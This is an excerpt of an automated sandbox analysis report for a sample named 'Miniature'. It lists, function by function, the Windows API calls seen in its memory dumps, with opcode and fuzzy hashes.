                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 64adfe436902f4086a47174ff6321b01c216aeb4002ad0071291354f3eec01ec
                                                                                                                                                                                                                                                                                            • Instruction ID: 0a8ca8731824c168849072742c2227039f4df37eca3645e779e4300134e14ae7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64adfe436902f4086a47174ff6321b01c216aeb4002ad0071291354f3eec01ec
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B431B171900219EFDB14CFA8CD89BDE7BB5EB05325F108225FA26A72E1C770DA44DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C8CC63,00000000), ref: 00C8D97D
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00C8D9B4
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00C8CC63,00000000), ref: 00C8D9F9
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C8CC63,00000000), ref: 00C8DA0D
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C8CC63,00000000), ref: 00C8DA37
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6bbd50030e2eea17b9d03f1aab6acf78e3524d55c8eb4271f332aa2c0afc9562
                                                                                                                                                                                                                                                                                            • Instruction ID: 0e51ba046cf1b9c76dcb5f79e048066f239747055ba9dc79151132ebc109bbf4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bbd50030e2eea17b9d03f1aab6acf78e3524d55c8eb4271f332aa2c0afc9562
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11314A71504205EFDB24EFA6D884AAFBBF8EB04358B20442EE557D3190DB30EE41EB64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CA61E4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CA623C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA624E
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA6259
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA62B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c75fc7a287152d9ec3b667be720650185b6106c6f5d2bfd79b7ac71ccbfe2f2d
                                                                                                                                                                                                                                                                                            • Instruction ID: bfe3b2b3d46f10080a8a5391e3ba35d994ab49268d3be628d6d9b37f26fe7265
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75fc7a287152d9ec3b667be720650185b6106c6f5d2bfd79b7ac71ccbfe2f2d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 772185719002199ADF209FA5DC84BEE77B8EF06328F148216FA35EB184D7709A85DF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00C913AE
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00C913C5
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C91401
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00C9140D
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00C91445
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7b349b27ec23e955891016b178be3d63ec403c653b716e8adf5963be362b2e66
                                                                                                                                                                                                                                                                                            • Instruction ID: 761895bf4a5dbaf9f2950204c577fdde04b39f0827b047b29cabe702a9ed1ca0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b349b27ec23e955891016b178be3d63ec403c653b716e8adf5963be362b2e66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A218E76600214AFDB04EF65C889BAEB7F5EF49304B048429F85BD7761CA30AD40DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00C4D146
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4D169
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C36A79,?,0000015D,?,?,?,?,00C385B0,000000FF,00000000,?,?), ref: 00C43BC5
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C4D18F
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4D1A2
                                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C4D1B1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b71946c0a361ac1bfd32f32427d4d5e7d7f1cb07d60ff68f9f822d4b0d56d8a6
                                                                                                                                                                                                                                                                                            • Instruction ID: 19452532b11db86f3a63e12d4c453a6ae6174b1365876fc4b12190fbb6809e69
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b71946c0a361ac1bfd32f32427d4d5e7d7f1cb07d60ff68f9f822d4b0d56d8a6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A01B1736026157F272136665C88E7F6A7DFEC3B71314016ABD07C7250DA608D0191B0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cdccba9c728d5f2f7f14d7b2036d1ff3d1f748a2494ffd0bf270a5a2b363de59
                                                                                                                                                                                                                                                                                            • Instruction ID: d5cc8801051d0f5a961676d65bf79eeec810ac1ea13552eb32c10504cf73d91e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdccba9c728d5f2f7f14d7b2036d1ff3d1f748a2494ffd0bf270a5a2b363de59
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2101D4F2600B057FD71466219C82FEB735D9E5139CF188031FD0E9B242E761EE10D2A9
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0000000A,?,?,00C3F64E,00C3545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C43170
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C431A5
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C431CC
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C431D9
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C431E2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8e6671e36ef2a682dfe7cda6a276b156673a9e51dc51d76d1f5321cf264bb1cb
                                                                                                                                                                                                                                                                                            • Instruction ID: c4d1ba7aeb749b4f1f11a379ed43571f73164dd2befeec0fe1dc35e3003f23ca
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e6671e36ef2a682dfe7cda6a276b156673a9e51dc51d76d1f5321cf264bb1cb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D301F472A416802B9A1277359C86F2F2669BFC13757200426FC36921D1EE218B019120
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?,?,00C70C4E), ref: 00C7091B
                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70936
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70944
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?), ref: 00C70954
                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70960
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C7F2AE
                                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00C7F2BC
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C7F2C4
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C7F2CE
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 00C7F30A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71A60
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A6C
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A7B
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A82
                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C71A99
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C71976
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C71982
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71991
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71998
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C719AE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C71916
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C71922
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C71931
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C71938
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C7194E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CCB
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CD8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CE5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CF2
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80CFF
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C80B24,?,00C83D41,?,00000001,00C53AF4,?), ref: 00C80D0C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C765BF
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C765D6
                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00C765EE
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00C7660A
                                                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00C76624
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                            • String ID:
